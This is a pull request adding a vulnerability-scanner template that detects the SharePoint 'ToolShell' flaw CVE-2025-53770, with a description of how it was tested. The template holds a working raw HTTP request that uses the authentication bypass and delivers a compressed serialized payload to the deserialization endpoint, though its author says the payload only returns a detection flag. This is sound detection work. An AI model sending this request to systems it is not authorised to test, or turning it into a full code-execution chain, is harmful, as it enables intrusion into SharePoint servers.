### PR TITLE
Adds check for CVE-2025-53770

### DIFF
--- a/http/cves/CVE-2025-53770.yaml
+++ b/http/cves/CVE-2025-53770.yaml
@@ -1,0 +1,46 @@
+id: CVE-2025-53770
+
+info:
+  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
+  author: SamIntruder
+  severity: critical
+  description: |
+    A combination of two issues in Microsoft SharePoint allows an attacker to access the Web Part editor without authentication, and then via insecure deserialization of an object in the request body, execute code.
+  impact: |
+    Vulnerable versions of SharePoint on-premises can be exploited to execute chosen code.
+  reference:
+    - https://cvemon.intruder.io/cves/CVE-2025-53770
+    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
+    - https://github.com/hazcod/CVE-2025-53770
+  classification:
+    cve-id: CVE-2025-53770
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    max-request: 1
+  tags: cve,cve2025,sharepoint,rce
+
+requests:
+  - raw:
+    - |
+      POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
+      Host: {{Host}}
+      Referer: /_layouts/SignOut.aspx
+      Content-Type: application/x-www-form-urlencoded
+
+      MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'CompressedDataTable=&quot;(.*?)&quot;'
+        name: encoded_response
+        group: 1
+        internal: true
+
+    matchers:
+      - type: dsl
+        name: decoded_response
+        dsl:
+          - contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")


### PR DESCRIPTION
### Template / PR Information

This template adds a check for CVE-2025-53770 in SharePoint aka 'ToolShell'.

Payload-wise, it essentially uses the method from https://github.com/hazcod/CVE-2025-53770 - this is *not* exploiting the RCE, simply submitting a serialized payload to the vulnerable endpoint and checking the response contains the flag. The flag is a few embedded objects deep (hence the regex + base64/gz shenanigans on the matcher), but doesn't contain the objects required to set up an actual RCE chain.

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

Tested against known-patched and known-vulnerable hosts to verify success, also run against a selection of irrelevant hosts to check for spurious FP.

Any input on whether there is a better way to do the matching process, etc, greatly appreciated!
